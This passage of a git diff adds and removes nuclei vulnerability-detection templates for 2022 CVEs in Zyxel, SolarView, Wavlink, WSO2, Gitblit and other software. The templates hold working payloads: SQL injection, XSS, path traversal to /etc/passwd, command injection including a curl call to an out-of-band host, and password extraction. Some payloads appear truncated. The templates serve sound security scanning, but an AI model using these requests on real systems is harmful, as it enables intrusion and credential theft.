https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927 - - https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip - - https://www.exploit-db.com/exploits/50891 - - https://nvd.nist.gov/vuln/detail/CVE-2022-27927 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-27927 - cwe-id: CWE-89 - metadata: - verified: "true" - tags: cve,cve2022,sqli,microfinance -variables: - num: "999999999" -requests: - - raw: - - | - GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1 - Host: {{Hostname}} - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/CVE-2022/CVE-2022-28219.yaml b/nuclei-templates/CVE-2022/CVE-2022-28219.yaml deleted file mode 100644 index a812336fd8..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-28219.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2022-28219 -info: - name: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution - author: dwisiswant0 - severity: critical - description: | - Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an - unauthenticated XML entity injection attack that can lead to remote code execution. - reference: - - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html - - https://www.horizon3.ai/red-team-blog-cve-2022-28219/ - - https://manageengine.com - - https://nvd.nist.gov/vuln/detail/CVE-2022-28219 - remediation: | - Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus - is configured with a dedicated service account with restricted privileges. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-28219 - cwe-id: CWE-611 - metadata: - shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" - verified: "true" - tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth -requests: - - method: POST - path: - - "{{BaseURL}}/api/agent/tabs/agentData" - headers: - Content-Type: application/json - body: | - [ - { - "DomainName": "{{Host}}", - "EventCode": 4688, - "EventType": 0, - "TimeGenerated": 0, - "Task Content": " %xxe; ]>" - } - ] - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - type: word - part: body - words: - - "ManageEngine" - -# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/CVE-2022/CVE-2022-28365.yaml b/nuclei-templates/CVE-2022/CVE-2022-28365.yaml deleted file mode 100644 index 2901fb229e..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-28365.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2022-28365 - -info: - name: Reprise License Manager 14.2 - Information Disclosure - author: Akincibor - severity: medium - description: | - Reprise License Manager 14.2 is susceptible to information disclosure via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. An attacker can possibly obtain further sensitive information, modify data, and/or execute unauthorized operations. - remediation: | - Apply the latest security patch or upgrade to a non-vulnerable version of Reprise License Manager. - reference: - - https://www.reprisesoftware.com/products/software-license-management.php - - https://github.com/advisories/GHSA-4g2v-6x25-vr7p - - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-28365 - - https://www.reprisesoftware.com/RELEASE_NOTES - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2022-28365 - cwe-id: CWE-425 - epss-score: 0.00561 - epss-percentile: 0.75215 - cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: reprisesoftware - product: reprise_license_manager - tags: rlm,packetstorm,cve,cve2022,exposure - -http: - - method: GET - path: - - "{{BaseURL}}/goforms/rlminfo" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "RLM Version" - - "Platform type" - condition: and - - - type: status - status: - - 200 - -# digest: 4a0a0047304502205821330339f0d29034ad51d0bd2c9c2ace4e7b307ad085540ce4f385939d6f7102210089477bf6056245d4a2c185812ec917c18538d593922361f020a3c6c14ee25015:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2022/CVE-2022-29298.yaml b/nuclei-templates/CVE-2022/CVE-2022-29298.yaml deleted file mode 100644 index 191cb6e9b8..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-29298.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2022-29298 -info: - name: SolarView Compact 6.00 - Directory Traversal - author: ritikchaddha - severity: high - description: SolarView Compact ver.6.00 allows attackers to access sensitive files via directory traversal. - reference: - - https://www.exploit-db.com/exploits/50950 - - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view - - https://nvd.nist.gov/vuln/detail/CVE-2022-29298 - - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-29298 - cwe-id: CWE-22 - metadata: - shodan-query: http.html:"SolarView Compact" - verified: "true" - tags: cve,cve2022,lfi,solarview -requests: - - method: GET - path: - - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-29299.yaml b/nuclei-templates/CVE-2022/CVE-2022-29299.yaml deleted file mode 100644 index 7bec163c15..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-29299.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2022-29299 -info: - name: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting - author: For3stCo1d - severity: medium - description: | - SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php. - reference: - - https://www.exploit-db.com/exploits/50967 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299 - classification: - cve-id: CVE-2022-29299 - metadata: - verified: true - shodan-query: http.favicon.hash:-244067125 - tags: cve,cve2022,xss,solarview -requests: - - method: GET - path: - - '{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6' - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<"">' - - '/Solar_History.php" METHOD="post">' - condition: and - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 - -# Enhanced by cs 06/21/2022 diff --git a/nuclei-templates/CVE-2022/CVE-2022-29303.yaml b/nuclei-templates/CVE-2022/CVE-2022-29303.yaml deleted file mode 100644 index 1d2c392e54..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-29303.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2022-29303 - -info: - name: SolarView Compact 6.00 - OS Command Injection - author: badboycxcc - severity: critical - description: | - SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php. - reference: - - https://www.exploit-db.com/exploits/50940 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303 - - https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-29303 - cwe-id: CWE-77 - metadata: - shodan-query: http.html:"SolarView Compact" - verified: "true" - tags: cve,cve2022,rce,injection,solarview,edb - -variables: - cmd: "cat${IFS}/etc/passwd" - -requests: - - raw: - - | - @timeout: 25s - POST /conf_mail.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M - - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0" - -# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/CVE-2022/CVE-2022-29548.yaml b/nuclei-templates/CVE-2022/CVE-2022-29548.yaml deleted file mode 100644 index f6b5e980e8..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-29548.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2022-29548 -info: - name: WSO2 Management Console - Reflected XSS - author: edoardottt - severity: medium - description: | - A reflected XSS issue exists in the Management Console of several WSO2 products. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548 - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-29548 - cwe-id: CWE-79 - metadata: - google-dork: inurl:"carbon/admin/login" - verified: "true" - tags: cve,cve2022,wso2,xss -requests: - - method: GET - path: - - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "CARBON.showWarningDialog('???');alert(document.domain)//???" - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30073.yaml b/nuclei-templates/CVE-2022/CVE-2022-30073.yaml new file mode 100644 index 0000000000..6ffd826db8 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-30073.yaml @@ -0,0 +1,63 @@ +id: CVE-2022-30073 +info: + name: WBCE CMS v1.5.2 XSS Stored + author: arafatansari + severity: medium + description: | + WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\user\save.php Display Name parameters. + reference: + - https://github.com/APTX-4879/CVE + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30073 + - https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-30073 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2022,wbcecms,xss +requests: + - raw: + - | + POST /admin/login/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login + - | + GET /admin/users/index.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /admin/users/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit= + - | + GET /admin/users/index.php HTTP/1.1 + Host: {{Hostname}} + extractors: + - type: regex + name: formtoken + part: body + group: 1 + regex: + - '' + internal: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

" + - "WBCECMS" + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30489.yaml b/nuclei-templates/CVE-2022/CVE-2022-30489.yaml new file mode 100644 index 0000000000..fa2302aea9 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-30489.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-30489 +info: + name: Wavlink Wn535g3 - POST XSS + author: For3stCo1d + severity: medium + description: | + WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi. + reference: + - https://github.com/badboycxcc/XSS-CVE-2022-30489 + - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 + - https://github.com/badboycxcc/XSS + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-30489 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" + tags: xss,cve2022,wavlink,cve,router,iot +requests: + - raw: + - | + POST /cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn + matchers-condition: and + matchers: + - type: word + words: + - '' + - 'parent.location.replace("http://")' + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30525.yaml b/nuclei-templates/CVE-2022/CVE-2022-30525.yaml new file mode 100644 index 0000000000..f1fe6f3456 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-30525.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-30525 +info: + name: Zyxel Firewall - OS Command Injection + author: h1ei1,prajiteshsingh + severity: critical + description: | + An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. + reference: + - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ + - https://github.com/rapid7/metasploit-framework/pull/16563 + - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml + - https://nvd.nist.gov/vuln/detail/CVE-2022-30525 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-30525 + cwe-id: CWE-78 + metadata: + shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" + tags: rce,zyxel,cve,cve2022,firewall,unauth,kev +requests: + - raw: + - | + POST /ztp/cgi-bin/handler HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"} + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + - type: status + status: + - 500 + +# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30777.yaml b/nuclei-templates/CVE-2022/CVE-2022-30777.yaml new file mode 100644 index 0000000000..2c50f208fc --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-30777.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-30777 +info: + name: Parallels H-Sphere - Cross Site Scripting + author: 3th1c_yuk1 + severity: medium + description: | + Parallels H-Sphere 3.6.1713 allows XSS via the index_en.php from parameter. + reference: + - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59 + - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 + - https://en.wikipedia.org/wiki/H-Sphere + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-30777 + cwe-id: CWE-79 + metadata: + shodan-query: title:"h-sphere" + verified: "true" + tags: cve,cve2022,parallels,hsphere,xss +requests: + - method: GET + path: + - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - '"><script>alert(document.domain)</script>' + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-31268.yaml b/nuclei-templates/CVE-2022/CVE-2022-31268.yaml new file mode 100644 index 0000000000..ada90dc224 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-31268.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-31268 +info: + name: Gitblit 1.9.3 - Path traversal + author: 0x_Akoko + severity: high + description: | + A Path Traversal vulnerability in Gitblit 1.9.3 can lead to reading website files via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname). + reference: + - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md + - https://www.cvedetails.com/cve/CVE-2022-31268 + - https://vuldb.com/?id.200500 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-31268 + cwe-id: CWE-22 + metadata: + shodan-query: http.html:"Gitblit" + verified: "true" + tags: cve,cve2022,lfi,gitblit +requests: + - method: GET + path: + - "{{BaseURL}}/resources//../WEB-INF/web.xml" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "</web-app>" + - "java.sun.com" + - "gitblit.properties" + condition: and + - type: word + part: header + words: + - "application/xml" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-31373.yaml b/nuclei-templates/CVE-2022/CVE-2022-31373.yaml deleted file mode 100644 index c09b86777f..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-31373.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2022-31373 -info: - name: SolarView Compact 6.00 - Cross-Site Scripting(XSS) - author: ritikchaddha - severity: medium - description: | - SolarView Compact v6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Solar_AiConf.php. - reference: - - https://github.com/badboycxcc/SolarView_Compact_6.0_xss - - https://nvd.nist.gov/vuln/detail/CVE-2022-31373 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-31373 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"SolarView Compact" - verified: "true" - tags: cve,cve2022,xss,solarview -requests: - - method: GET - path: - - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - part: body - words: - - '/Solar_AiConf.php/"><script>alert(document.domain)</script>' - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-31793.yaml b/nuclei-templates/CVE-2022/CVE-2022-31793.yaml deleted file mode 100644 index 7b771a920c..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-31793.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2022-31793 -info: - name: muhttpd <= 1.1.5 - Path traversal - author: scent2d - severity: high - description: | - A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system. - reference: - - https://derekabdine.com/blog/2022-arris-advisory.html - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793 - - https://nvd.nist.gov/vuln/detail/CVE-2022-31793 - - https://derekabdine.com/blog/2022-arris-advisory - metadata: - verified: "true" - tags: cve,cve2022,network,muhttpd,lfi,unauth -network: - - host: - - "{{Hostname}}" - inputs: - - data: "47455420612F6574632F706173737764" - type: hex - - data: "\n\n" - read-size: 128 - matchers: - - type: word - part: body - encoding: hex - words: - - "726f6f743a" diff --git a/nuclei-templates/CVE-2022/CVE-2022-32024.yaml b/nuclei-templates/CVE-2022/CVE-2022-32024.yaml new file mode 100644 index 0000000000..644f0f8df2 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32024.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-32024 +info: + name: Car Rental Management System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System v1.0 is vulnerable to SQL Injection via /booking.php?car_id=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-4.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32024 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32024 + cwe-id: CWE-89 + metadata: + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,authenticated +variables: + num: "999999999" +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 + Host: {{Hostname}} + skip-variables-check: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32025.yaml b/nuclei-templates/CVE-2022/CVE-2022-32025.yaml new file mode 100644 index 0000000000..fb24e14552 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32025.yaml @@ -0,0 +1,46 @@ +id: CVE-2022-32025 +info: + name: Car Rental Management System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/view_car.php?id=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32025 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32025 + cwe-id: CWE-89 + metadata: + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,authenticated +variables: + num: "999999999" +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}%23&password={{password}} + - | + GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 + Host: {{Hostname}} + skip-variables-check: true + redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32028.yaml b/nuclei-templates/CVE-2022/CVE-2022-32028.yaml new file mode 100644 index 0000000000..6afb4dca59 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32028.yaml @@ -0,0 +1,46 @@ +id: CVE-2022-32028 +info: + name: Car Rental Management System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32028 + cwe-id: CWE-89 + metadata: + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,authenticated +variables: + num: "999999999" +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 + Host: {{Hostname}} + skip-variables-check: true + redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32409.yaml b/nuclei-templates/CVE-2022/CVE-2022-32409.yaml new file mode 100644 index 0000000000..aec3372d91 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32409.yaml @@ -0,0 +1,31 @@ +id: CVE-2022-32409 +info: + name: i3geo - Directory Traversal + author: pikpikcu + severity: critical + description: A local file inclusion (LFI) vulnerability in the component codemirror.php of Portal do Software Publico Brasileiro i3geo v7.0.5 allows attackers to execute arbitrary PHP code via a crafted HTTP request + reference: + - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt + - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-32409 + cwe-id: CWE-94 + metadata: + shodan-query: http.html:"i3geo" + verified: "true" + tags: cve,cve2022,i3geo,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-33174.yaml b/nuclei-templates/CVE-2022/CVE-2022-33174.yaml deleted file mode 100644 index 26dd8298df..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-33174.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2022-33174 -info: - name: Powertek Firmware - Authorization Bypass - author: pikpikcu - severity: high - description: | - Power Distribution Units running on Powertek firmware (multiple brands) before 3.30.30 allows remote authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext. - reference: - - https://gynvael.coldwind.pl/?lang=en&id=748 - - https://nvd.nist.gov/vuln/detail/CVE-2022-33174 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-33174 - cwe-id: CWE-863 - metadata: - shodan-query: http.html:"Powertek" - verified: "true" - tags: cve,cve2022,powertek,auth-bypass -requests: - - raw: - - | - GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1 - Host: {{Hostname}} - Cookie: tmpToken=; - matchers-condition: and - matchers: - - type: word - words: - - '<sys.passwd>' - - '<sys.su.name>' - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '<sys\.passwd>([A-Z0-9a-z]+)<\/sys\.passwd>' - - '<sys\.su\.name>([a-z]+)<\/sys\.su\.name>' diff --git a/nuclei-templates/CVE-2022/CVE-2022-34046.yaml b/nuclei-templates/CVE-2022/CVE-2022-34046.yaml deleted file mode 100644 index 0e55de9a03..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-34046.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2022-34046 -info: - name: Wavlink Sysinit.shtml - Password Exposure - author: For3stCo1d - severity: high - description: | - An access control issue in Wavlink WN533A8 M33A8.V5030.190716 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);]. - reference: - - https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046 - metadata: - verified: true - shodan-query: http.title:"Wi-Fi APP Login" - tags: cve,cve2022,wavlink,router,exposure -requests: - - raw: - - | - GET /sysinit.shtml?r=52300 HTTP/1.1 - Host: {{Hostname}} - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'var syspasswd="' - - '<title>APP' - condition: and - - type: status - status: - - 200 - extractors: - - type: regex - regex: - - 'syspasswd="(.+?)"' diff --git a/nuclei-templates/CVE-2022/CVE-2022-34048.yaml b/nuclei-templates/CVE-2022/CVE-2022-34048.yaml new file mode 100644 index 0000000000..7292a945a4 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-34048.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-34048 +info: + name: Wavlink 